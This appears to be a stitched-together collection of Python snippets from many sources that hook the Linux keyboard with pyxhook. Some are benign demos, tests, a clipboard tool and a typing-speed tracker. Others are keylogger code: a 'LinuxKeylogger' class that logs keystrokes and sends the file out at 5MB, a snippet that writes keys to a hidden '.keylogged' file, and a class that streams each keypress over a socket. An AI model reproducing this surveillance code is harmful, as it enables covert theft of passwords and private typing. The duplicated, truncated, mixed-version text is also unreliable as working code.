def echo_keypresses():
print('Echoing key presses.')
print('Press ctrl+c to exit.')
control_keys = ["Control_R", "Control_L",]
control = [False]
def handle_keydown(event):
print('Key-down:')
print('\tkey:', event.Key)
print('\tkey id:', event.KeyID)
print('\tscan code:', event.ScanCode)
if event.Key in control_keys:
control[0] = True
elif control[0] and event.Key in ('C','c'):
sys.exit()
def handle_keyup(event):
print('Key-up:')
print('\tkey:', event.Key)
print('\tkey id:', event.KeyID)
print('\tscan code:', event.ScanCode)
if event.Key in control_keys:
control[0] = False
hm = HookManager()
hm.HookKeyboard()
hm.KeyDown = handle_keydown
hm.KeyUp = handle_keyup
hm.start()
def main():
onKeyPress = Constructor()
keyboard = HookManager()
keyboard.KeyDown = onKeyPress
keyboard.KeyUp = onKeyPress
keyboard.HookKeyboard()
keyboard.start()
class KeyListeningAgent(object):
def __init__(self):
self.klg = HookManager()
self.klg.KeyDown = self.key_down
self.klg.KeyUp = self.key_up
self.klg.HookKeyboard()
self.klg.start()
self.pressed_key = "none"
def key_down(self, event):
k = event.Key
self.pressed_key = k.lower()
def key_up(self, event):
self.pressed_key = "none"
def process_image(self, image):
# Working image.
work_image = np.array(image)
# Grayed-out.
image_gray = cv2.cvtColor(work_image, cv2.COLOR_RGB2GRAY)
# Inverting to make objects easier to "see".
image_gray = cv2.bitwise_not(image_gray)
# Resize for neural net.
image_resize = cv2.resize(
image_gray, (image_gray.shape[1] // 4, image_gray.shape[0] // 4),
interpolation=cv2.INTER_NEAREST)
return image_resize
def run(self):
print 'Running...'
hm = HookManager()
hm.HookKeyboard()
hm.KeyDown = self.handle_keydown
hm.KeyUp = self.handle_keyup
hm.start()
def run(self):
print('Running...')
hm = HookManager()
hm.HookKeyboard()
hm.KeyDown = self.handle_keydown
hm.KeyUp = self.handle_keyup
hm.start()
def echo_keypresses():
print 'Echoing key presses.'
print 'Press ctrl+c to exit.'
control_keys = ["Control_R", "Control_L",]
control = [False]
def handle_keydown(event):
print 'Key-down:'
print '\tkey:',event.Key
print '\tkey id:',event.KeyID
print '\tscan code:',event.ScanCode
if event.Key in control_keys:
control[0] = True
elif control[0] and event.Key in ('C','c'):
sys.exit()
def handle_keyup(event):
print 'Key-up:'
print '\tkey:',event.Key
print '\tkey id:',event.KeyID
print '\tscan code:',event.ScanCode
if event.Key in control_keys:
control[0] = False
hm = HookManager()
hm.HookKeyboard()
hm.KeyDown = handle_keydown
hm.KeyUp = handle_keyup
hm.start()
class LinuxKeylogger():
def __init__(self):
self.new_hook = HookManager() # Instantiate HookManager class
self.new_hook.KeyDown = self.onKeyPress # listen to all keystrokes
self.new_hook.HookKeyboard() # hook the keyboard
self.new_hook.start() # start the hook session
def onKeyPress(self, event):
global timeNow
global data
global exitStack
global keyLength
global wifiLogsFile
global keylogsFile
if event.Key == 'space':
event.Key = ' '
elif event.Key == 'Tab':
event.Key = '<TAB>'
elif event.Key == 'BackSpace':
event.Key = '<Backspace>'
elif event.Key == 'Shift_L' or event.Key == 'Shift_R':
event.Key = '<Shift>'
elif event.Key == 'Delete':
event.Key = '<Delete>'
data += event.Key
print exitStack
if event.Key == '<Backspace>':
exitStack.append(event.Key)
elif event.Key == '<Delete>':
exitStack.append(event.Key)
else:
exitStack = []
if len(exitStack) == 4:
print exitStack
if exitStack[0] == '<Backspace>' and exitStack[
1] == '<Delete>' and exitStack[
2] == '<Backspace>' and exitStack[
3] == '<Delete>': # If last four values
sysExit(0)
# TODO Implement a GUI version of our exit task
else:
exitStack = []
if len(data) == 128: # Write data in chucks of 128 bytes
writeKeylogs()
data = ''
if os.path.getsize(
keylogsFile) >= 5e+6: # Send log file when it reaches 5MB
t = threading.Thread(target=sendFile(), args=())
t.start()
class Keylogger: def __init__(self): self.klg = HookManager() self.klg.KeyDown = self.listening self.klg.HookKeyboard() self.klg.start() def listening(self, event): k = event.Key print k if k == "space": k = " "
class Keylogger:
def __init__(self):
self.klg = HookManager()
self.klg.KeyDown = self.listening
self.klg.HookKeyboard()
self.klg.start()
def listening(self, event):
k = event.Key
print k
if k == "space":
k = " "
class LinuxKeylogger():
def __init__(self):
self.new_hook = HookManager() # Instantiate HookManager class
self.new_hook.KeyDown = self.onKeyPress # listen to all keystrokes
self.new_hook.HookKeyboard() # hook the keyboard
self.new_hook.start() # start the hook session
def onKeyPress(self, event):
global timeNow
global data
global exitStack
global keyLength
global wifiLogsFile
global keylogsFile
if event.Key == 'space':
event.Key = ' '
elif event.Key == 'Tab':
event.Key = '<TAB>'
elif event.Key == 'BackSpace':
event.Key = '<Backspace>'
elif event.Key == 'Shift_L' or event.Key == 'Shift_R':
event.Key = '<Shift>'
elif event.Key == 'Delete':
event.Key = '<Delete>'
data += event.Key
print exitStack
if event.Key == '<Backspace>':
exitStack.append(event.Key)
elif event.Key == '<Delete>':
exitStack.append(event.Key)
else:
exitStack = []
if len(exitStack) == 4:
print exitStack
if exitStack[0] == '<Backspace>' and exitStack[1] == '<Delete>' and exitStack[2] == '<Backspace>' and exitStack[3] == '<Delete>': # If last four values
sysExit(0)
# TODO Implement a GUI version of our exit task
else:
exitStack = []
if len(data) == 128: # Write data in chucks of 128 bytes
writeKeylogs()
data = ''
if os.path.getsize(keylogsFile) >= 5e+6: # Send log file when it reaches 5MB
t = threading.Thread(target=sendFile(), args=())
t.start()
class Keylogger:
def __init__(self):
self.klg = HookManager()
self.klg.KeyDown = self.listening
self.klg.HookKeyboard()
self.klg.start()
def listening(self, event):
k = event.Key
if k == "space": k = " "
with open('.keylogged', 'a+') as keylogging:
keylogging.write('%s\n' % k)
class ThreadedKeyBind(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
self.new_hook = HookManager()
self.new_hook.KeyDown = self.OnKeyPress
self.new_hook.HookKeyboard()
self.new_hook.start()
# self.new_hook.cancel()
def OnKeyPress(self, event):
"""
function called when any key is pressed
"""
global prev_Key, key_binding
if event.Key == key_binding[1] and prev_Key == key_binding[0]:
if utils.active == 1:
utils.active = 0
elif utils.active == 0:
utils.active = 1
prev_Key = None
elif event.Key == 'c' and prev_Key == 'Control_L':
self.text = xerox.paste(xsel=True)
utils.clips.append(self.text)
# pickle clips data
with open(os.path.join(os.path.dirname(__file__), 'clips_data'),
"wb") as f:
pickle.dump(utils.clips, f, protocol=2)
print("You just copied: {}".format(self.text))
elif event.Key == 'z' and prev_Key == 'Control_L':
print("can")
self.new_hook.cancel()
else:
prev_Key = event.Key
return True
class Keyboard(object):
__hook = None
def __init__(self):
pass
def getKeys(self):
pass
def getKeysData(self,socketClient, size):
def sendKey(event):
data = json.dumps({'type': 6, 'code': 1 ,'status' : 'OK', 'keyboard': str(event)})
try:
socketClient.sendall(data)
except:
return
self.__hook = HookManager()
self.__hook.HookKeyboard()
self.__hook.KeyDown = sendKey
self.__hook.start()
time.sleep(size)
self.__hook.cancel()
# Actions for each key state
if state == 0x3c:
send_key("Escape")
elif state == 0xe:
send_key("F5")
elif state == 0xd:
send_key("F7")
# Send an emulated keypress to the current window of the X session
def send_key(emulated_key):
window = display.get_input_focus()._data["focus"];
# Generate the correct keycode
keysym = Xlib.XK.string_to_keysym(emulated_key)
keycode = display.keysym_to_keycode(keysym)
# Send a fake keypress via xtest
Xlib.ext.xtest.fake_input(display, Xlib.X.KeyPress, keycode)
display.sync()
time.sleep(0.5)
Xlib.ext.xtest.fake_input(display, Xlib.X.KeyRelease, keycode)
display.sync()
# Load the hook manager and snoop on all KeyUp and KeyDown events
hm = HookManager()
hm.HookKeyboard()
hm.KeyUp = handle_release
hm.KeyDown = handle_press
hm.start()
class TestPyxHook(TestBase):
"""
Tests the pyxhook library for Linux.
"""
def setUp(self):
pass
def tearDown(self):
pass
# Key generator.
def generator(self, s, key=None):
for i in range(len(s)):
if key is not None:
yield key
if s[i] in specialKeysyms.keys():
yield specialKeysyms[s[i]]
else:
yield s[i]
def reportevent(self, event):
# It's not case sensitive.
ek = string.lower(event.Key)
ngn = string.lower(next(self.gn))
# We don't care about underscores.
ngn = string.replace(ngn, "_", "")
print ek, ngn
self.assertEqual(ek, ngn)
def base_test(self):
self.hm = HookManager()
self.hm.HookKeyboard()
self.hm.HookMouse()
self.hm.KeyDown = self.reportevent
self.hm.MouseAllButtonsDown = self.reportevent
self.hm.MouseAllButtonsUp = self.reportevent
self.hm.start()
d = Display()
def test_numbers(self):
numbers = '0123456789'
self.gn = self.generator(numbers)
self.base_test()
emulateWritingString(d, numbers, 0.075) # 75ms
self.hm.cancel()
def test_lowercase(self):
lc = u'abcdefghijklmnopqrstuvwxyz'
self.gn = self.generator(lc)
self.base_test()
emulateWritingString(d, lc, 0.075) # 75ms
self.hm.cancel()
def test_uppercase(self):
uc = u'abcdefghijklmnopqrstuvwxyz'
self.gn = self.generator(uc, 'shift_l')
self.base_test()
emulateWritingString(d, string.upper(uc), 0.075) # 75ms
self.hm.cancel()
def test_simple_symbols(self):
uc = u"º'¡\t\n<+ç" # \r
self.gn = self.generator(uc)
self.base_test()
emulateWritingString(d, uc, 0.075) # 75ms
self.hm.cancel()
def test_simple_combos_symbols(self):
keys = ['shift_l', 'shift_r', 'alt_l']
for key in keys:
ss = u"2"
self.gn = self.generator(ss, key)
self.base_test()
emulateWritingString(d, ss, 0.075, key) # 75ms
self.hm.cancel()
global FILEH
s = getTime( T_START )
st=str(s)+" "+str(K)+" "+str(e.ScanCode)+" "+str(e.Ascii)+" "+str(e.Key)+"\n"
FILEH.write( st.encode("utf-8") )
def keyDown( e ):
if STATE:
writeEvent( e, K_D, " Pressing: " + str( e.ScanCode ) )
def keyUp( e ):
if STATE:
writeEvent( e, K_U, " Released: " + str( e.ScanCode ) )
HM.KeyDown = keyDown
HM.KeyUp = keyUp
HM.start()
app = None
class Application( QWidget ):
LINES = getSampleText( "text.txt" )
OLINES = []
LINE = 0 #Which line it is on
FONT = QFont("Courier New", 11)
def __init__( self ):
super( Application, self ).__init__()
self.START = QPushButton( "Start Logging" )
self.START.setFont( self.FONT )
self.QUIT = QPushButton( "!!! EXIT APPLICATION !!!" )
self.QUIT.setFont( self.FONT )
class TestPyxHook(TestBase):
"""
Tests the pyxhook library for Linux.
"""
def setUp(self):
pass
def tearDown(self):
pass
# Key generator.
def generator(self, s, key=None):
for i in range(len(s)):
if key is not None:
yield key
if s[i] in specialKeysyms.keys():
yield specialKeysyms[s[i]]
else:
yield s[i]
def reportevent(self, event):
# It's not case sensitive.
ek = string.lower(event.Key)
ngn = string.lower(next(self.gn))
# We don't care about underscores.
ngn = string.replace(ngn, "_", "")
print ek, ngn
self.assertEqual(ek, ngn)
def base_test(self):
self.hm = HookManager()
self.hm.HookKeyboard()
self.hm.HookMouse()
self.hm.KeyDown = self.reportevent
self.hm.MouseAllButtonsDown = self.reportevent
self.hm.MouseAllButtonsUp = self.reportevent
self.hm.start()
d = Display()
def test_numbers(self):
numbers = '0123456789'
self.gn = self.generator(numbers)
self.base_test()
emulateWritingString(d, numbers, 0.075) # 75ms
self.hm.cancel()
def test_lowercase(self):
lc = u'abcdefghijklmnopqrstuvwxyz'
self.gn = self.generator(lc)
self.base_test()
emulateWritingString(d, lc, 0.075) # 75ms
self.hm.cancel()
def test_uppercase(self):
uc = u'abcdefghijklmnopqrstuvwxyz'
self.gn = self.generator(uc, 'shift_l')
self.base_test()
emulateWritingString(d, string.upper(uc), 0.075) # 75ms
self.hm.cancel()
def test_simple_symbols(self):
uc = u"º'¡\t\n<+ç" # \r
self.gn = self.generator(uc)
self.base_test()
emulateWritingString(d, uc, 0.075) # 75ms
self.hm.cancel()
def test_simple_combos_symbols(self):
keys = ['shift_l', 'shift_r', 'alt_l']
for key in keys:
ss = u"2"
self.gn = self.generator(ss, key)
self.base_test()
emulateWritingString(d, ss, 0.075, key) # 75ms
self.hm.cancel()
return {"file": file, "project": project}
def OnKeyPress(key):
global last_keypress, wpm
key_history[pointer] += 1
last_keypress = int(time.time())
wpm += 0.2
hook = HookManager()
hook.KeyDown = OnKeyPress
hook.HookKeyboard()
hook.start()
def avg_keys_per_second():
return round(sum(key_history[0:arraylength]) / (arraylength / 4), 2)
RPC.connect()
def update_rpc():
global curr_minute, last_wpm, wpm
if (round(time.time() / 60) != curr_minute):
last_wpm = wpm
wpm = 0
#!/usr/bin/env python
from pyxhook import HookManager
watched_keys = ["Control_R", "Control_L"]
def handle_event(event):
if event.Key in watched_keys:
print "KeyRelease"
hm = HookManager()
hm.HookKeyboard()
hm.KeyUp = handle_event
hm.start()
